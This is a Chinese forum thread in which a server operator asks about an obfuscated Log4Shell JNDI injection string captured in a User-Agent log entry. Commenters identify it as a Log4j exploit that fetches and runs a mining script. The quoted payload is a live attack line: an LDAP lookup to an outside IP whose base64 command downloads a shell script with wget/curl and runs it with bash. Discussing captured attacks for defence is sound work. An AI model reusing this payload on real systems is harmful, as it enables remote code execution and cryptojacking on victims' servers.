年前部署一个接口服务,通过日志,最近发现经常有 User-Agent 异常注入的访问 其中一个比较诡异的内容:
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//150.136.111.68:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L2ludGVsLnNoOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvaW50ZWwuc2g7IGJhc2ggaW50ZWwuc2ggNDY4cllRTXhuQ3YzWG9GclhmNWkyUWU5eVpyelZTZGdNV2hqaVAyNjRUQWdKNXc0WGU2UGlKdGFGRjc5amhlNWFIaG1rdVNGOEttc0xkczRyN0hNRHhDelJLbU1UN3o=}')
知道这是干嘛的吗
 |
1
ThirdFlame 2022-02-10 10:15:25 +08:00
log4shell
|
 |
2
silverfox 2022-02-10 10:21:03 +08:00
|
 |
3
zhazi 2022-02-10 10:22:30 +08:00
|
 |
4
maichaide 2022-02-10 11:03:53 +08:00
下载脚本开启探矿服务
|
 |
5
muzuiget 2022-02-10 13:28:35 +08:00
Log4j 漏洞,就是赌你用 Log4j 把 UserAgent 记录到日志中,实现远程执行代码。
|
 |
6
yundun2021 2022-02-10 13:34:59 +08:00
有条件可以上 WAF
|
 |
7
yu1u 2022-02-10 13:47:12 +08:00
log4j 漏洞攻击
|
 |
8
0x73346b757234 2022-02-10 18:04:25 +08:00
对面想通过 Log4j 漏洞下载 xmrig 挖矿脚本。多谢老哥提供了个样本,测了下自己的规则能覆盖,嘿嘿。
|
 |
11
kaka6 OP 又收到不少的 User-Agent:
Go-http-client/1.1 python-requests/2.20.1 curl/7.75.0 而且还来自世界各地,以前没做这么细的记录,现在全网做记录,发现了不少莫明访客 |
Select Language